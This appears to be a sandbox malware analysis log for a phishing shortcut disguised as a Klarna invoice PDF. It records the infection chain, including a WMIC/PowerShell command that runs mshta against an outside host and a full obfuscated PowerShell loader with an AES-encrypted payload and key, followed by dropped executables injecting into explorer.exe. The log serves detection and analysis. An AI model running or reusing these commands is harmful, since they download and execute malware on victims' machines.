            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: String function: 00231F13 appears 54 times
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: String function: 00270726 appears 34 times
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: String function: 009A1F13 appears 54 times
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: String function: 009A3821 appears 501 times
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: String function: 009E32F3 appears 83 times
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: String function: 009E0726 appears 34 times
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: String function: 009E0237 appears 683 times
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2621
            Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2621Jump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winLNK@38/63@6/3
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009DFE21 FormatMessageW,GetLastError,LocalFree,16_2_009DFE21
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009A45EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,16_2_009A45EE
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_002345EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,17_2_002345EE
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009E304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,16_2_009E304F
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: 18_2_00401540 FindResourceA,LoadResource,LockResource,_snprintf,LoadLibraryA,GetProcAddress,strncmp,strncmp,strncmp,UnmapViewOfFile,18_2_00401540
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009C6B88 ChangeServiceConfigW,GetLastError,16_2_009C6B88
            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uaguuush.g14.ps1Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCommand line argument: cabinet.dll16_2_009A1070
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCommand line argument: msi.dll16_2_009A1070
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCommand line argument: version.dll16_2_009A1070
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCommand line argument: wininet.dll16_2_009A1070
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCommand line argument: comres.dll16_2_009A1070
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCommand line argument: clbcatq.dll16_2_009A1070
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCommand line argument: msasn1.dll16_2_009A1070
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCommand line argument: crypt32.dll16_2_009A1070
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCommand line argument: feclient.dll16_2_009A1070
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCommand line argument: cabinet.dll16_2_009A1070
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCommand line argument: windows_exe18_2_00401110
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCommand line argument: sys18_2_00401110
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCommand line argument: _MessageBox18_2_00401110
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
            Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: WMIC.exe, 00000000.00000002.1752768362.0000017A53C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Select*fromWin32_Process;
            Source: KlarnaInvoice229837.pdf.lnkReversingLabs: Detection: 13%
            Source: IMAKBWPY.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
            Source: IMAKBWPY.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
            Source: pyexec.exeString found in binary or memory: --help
            Source: pyexec.exeString found in binary or memory: --help
            Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend"
            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://naubeautylus.ch/Headerfrontend
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '474A3D80681E00D6A2EF8CD9205A8000631C5C73110F4F3F98F9A3380757A56587AC33C982B8757EDE337D31FE178A5C76E820250B09678E60E099A6640F0003AD5BA580D4079FF31BFB3624F9936FF7E054A6F5E6ADF16AF70F2E258B230F0E119433E36E3EA1E08ACE300686446DBFFA1718086C874FC8A8A09ECE0BFD5827E2193AF83B13A9484213EC696E93EAD4E5C86D3B340D0383DF19D9C6B9177B473A715691E727DD59FAD481BB49CFEA164A8C8A2491D767B90BD1F1A11FC199A39158AB0C73865F35115CBBE29DBEC488B90B0DC061AD5039FE414583BD0E8BD4E7B7672D629DE366DBFAED2D2883ABA50A9A3E095A1B26777F10398DF92E050D286E806395A5648C371F95E62603829AB9CCCACC87BA02D01A00AFE9838ECF66997E0A551A83FFD859BBA6E2E568E9EDF081936A8569161CB274B3B9FC21427BBFF2D5D3CF500872D4A683668F2BA8C3038B93718EE8317DBCCA6305CD634DD1B2335210DC703C66A2F0B81A0128C9E257E324E61A18DA3ABFD1FF42A8E1E1E8F1E7A7E412839AAE35575C1AB8B6072F3F101F284610A7A9532CE85C597BD62A5F4DEB11490AF74CF21ECB396C3208FB1E2589B5CE209FFE1017BD9C5FAECDA99ACB77A243D50657551D5D47F459F8E119B10653DCCB3289C76C9277136D22F53A69199D62D4FFD4041CF72E1A171243BD2074D940A15228E8513CE7A56D65D8EC952DA1892A1C0DD32267424040F32729D596424618D14BC5778CA69A50F5378CE90DD67BF9999C530599FA84EEDF1437CAD4599F3B7A5E7C715AF39F96B02950C66C2C6BA86E0CA9B675D12FDB087692B5AAB0023D114DDA9F406E075D82EBF2F19297D6F614E17214DB113946B455BD69B36718F5E9FDD59B17F24ADE82623F8E02D3779A8A68B9AD01E429B87EFA6E75E2447F0911F56F9765C959A678DCB2037D736BE2BEBFAA18D5CD0E5D31518F484AA55F2B977C501125F80803041206588BADA41525EE9B8028EA58781C70961A6BB0694F09DA35A160ED1AE70FB8C2E6354A6F03BFC8C02611C83AD60917171564EB342465A947A75C12850F40B68C68DF9C5D83328A98798B17DBEA519B0CE39850F7D8E390584FED55BE5059CA71D2719A0D9B3575AD4DA7287E4D5C5F7EFBA6CC3A3F7F4BCD13AC1249B159691B69F1D64638B49A4BB7A28DA57B77892D7E8F00A1D56280ACF19657E31A66DFC23FBA50CFDA53B25280E96E1FBF839A922391F2D69B1839C422568935D9A35EB45649512E2FDFF02BB416951E3F123183CA94CCFCCB683F885C28A6612BE81855A88151A9D947C889DF4B8536261DCAAD58C911647AB6B0D09AAE2E7F0815EF1890124C736FB150D2551F0419A04AA7E0C0AA8A883CD43E6C794BCACCAFBDC6CEA95B925F072D8EC8D52F266541A22E74F87228F055F2EC79DE196F94BD5C59D029B1320B41AAF44D624365A3C1EC5F6B716D4A575948474E4552594C66474E';function cZF ($PgTDvwwB){return -split ($PgTDvwwB -replace '..', '0x$& ')};$kvsOmI = cZF($ddg.SubString(0, 2080));$qlR = [System.Security.Cryptography.Aes]::Create();$qlR.Key = cZF($ddg.SubString(2080));$qlR.IV = New-Object byte[] 16;$GluWYuA = $qlR.CreateDecryptor();$ZwjPYT = [System.String]::new($GluWYuA.TransformFinalBlock($kvsOmI, 0,$kvsOmI.Length)); sal fd $ZwjPYT.Substring(3,3); fd $ZwjPYT.Substring(6)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf"
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1636,i,12666906857534162029,3532720811796512563,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\IMAKBWPY.exe "C:\Users\user\AppData\Roaming\IMAKBWPY.exe"
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeProcess created: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe "C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe" -burn.clean.room="C:\Users\user\AppData\Roaming\IMAKBWPY.exe" -burn.filehandle.attached=520 -burn.filehandle.self=516
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeProcess created: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exe "C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exe"
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeProcess created: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exe C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exe
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://naubeautylus.ch/HeaderfrontendJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '474A3D80681E00D6A2EF8CD9205A8000631C5C73110F4F3F98F9A3380757A56587AC33C982B8757EDE337D31FE178A5C76E820250B09678E60E099A6640F0003AD5BA580D4079FF31BFB3624F9936FF7E054A6F5E6ADF16AF70F2E258B230F0E119433E36E3EA1E08ACE300686446DBFFA1718086C874FC8A8A09ECE0BFD5827E2193AF83B13A9484213EC696E93EAD4E5C86D3B340D0383DF19D9C6B9177B473A715691E727DD59FAD481BB49CFEA164A8C8A2491D767B90BD1F1A11FC199A39158AB0C73865F35115CBBE29DBEC488B90B0DC061AD5039FE414583BD0E8BD4E7B7672D629DE366DBFAED2D2883ABA50A9A3E095A1B26777F10398DF92E050D286E806395A5648C371F95E62603829AB9CCCACC87BA02D01A00AFE9838ECF66997E0A551A83FFD859BBA6E2E568E9EDF081936A8569161CB274B3B9FC21427BBFF2D5D3CF500872D4A683668F2BA8C3038B93718EE8317DBCCA6305CD634DD1B2335210DC703C66A2F0B81A0128C9E257E324E61A18DA3ABFD1FF42A8E1E1E8F1E7A7E412839AAE35575C1AB8B6072F3F101F284610A7A9532CE85C597BD62A5F4DEB11490AF74CF21ECB396C3208FB1E2589B5CE209FFE1017BD9C5FAECDA99ACB77A243D50657551D5D47F459F8E119B10653DCCB3289C76C9277136D22F53A69199D62D4FFD4041CF72E1A171243BD2074D940A15228E8513CE7A56D65D8EC952DA1892A1C0DD32267424040F32729D596424618D14BC5778CA69A50F5378CE90DD67BF9999C530599FA84EEDF1437CAD4599F3B7A5E7C715AF39F96B02950C66C2C6BA86E0CA9B675D12FDB087692B5AAB0023D114DDA9F406E075D82EBF2F19297D6F614E17214DB113946B455BD69B36718F5E9FDD59B17F24ADE82623F8E02D3779A8A68B9AD01E429B87EFA6E75E2447F0911F56F9765C959A678DCB2037D736BE2BEBFAA18D5CD0E5D31518F484AA55F2B977C501125F80803041206588BADA41525EE9B8028EA58781C70961A6BB0694F09DA35A160ED1AE70FB8C2E6354A6F03BFC8C02611C83AD60917171564EB342465A947A75C12850F40B68C68DF9C5D83328A98798B17DBEA519B0CE39850F7D8E390584FED55BE5059CA71D2719A0D9B3575AD4DA7287E4D5C5F7EFBA6CC3A3F7F4BCD13AC1249B159691B69F1D64638B49A4BB7A28DA57B77892D7E8F00A1D56280ACF19657E31A66DFC23FBA50CFDA53B25280E96E1FBF839A922391F2D69B1839C422568935D9A35EB45649512E2FDFF02BB416951E3F123183CA94CCFCCB683F885C28A6612BE81855A88151A9D947C889DF4B8536261DCAAD58C911647AB6B0D09AAE2E7F0815EF1890124C736FB150D2551F0419A04AA7E0C0AA8A883CD43E6C794BCACCAFBDC6CEA95B925F072D8EC8D52F266541A22E74F87228F055F2EC79DE196F94BD5C59D029B1320B41AAF44D624365A3C1EC5F6B716D4A575948474E4552594C66474E';function cZF ($PgTDvwwB){return -split ($PgTDvwwB -replace '..', '0x$& ')};$kvsOmI = cZF($ddg.SubString(0, 2080));$qlR = [System.Security.Cryptography.Aes]::Create();$qlR.Key = cZF($ddg.SubString(2080));$qlR.IV = New-Object byte[] 16;$GluWYuA = $qlR.CreateDecryptor();$ZwjPYT = [System.String]::new($GluWYuA.TransformFinalBlock($kvsOmI, 0,$kvsOmI.Length)); sal fd $ZwjPYT.Substring(3,3); fd $ZwjPYT.Substring(6)Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\IMAKBWPY.exe "C:\Users\user\AppData\Roaming\IMAKBWPY.exe" Jump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1636,i,12666906857534162029,3532720811796512563,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeProcess created: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe "C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe" -burn.clean.room="C:\Users\user\AppData\Roaming\IMAKBWPY.exe" -burn.filehandle.attached=520 -burn.filehandle.self=516
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeProcess created: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exe "C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exe"
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeProcess created: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exe C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exe
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
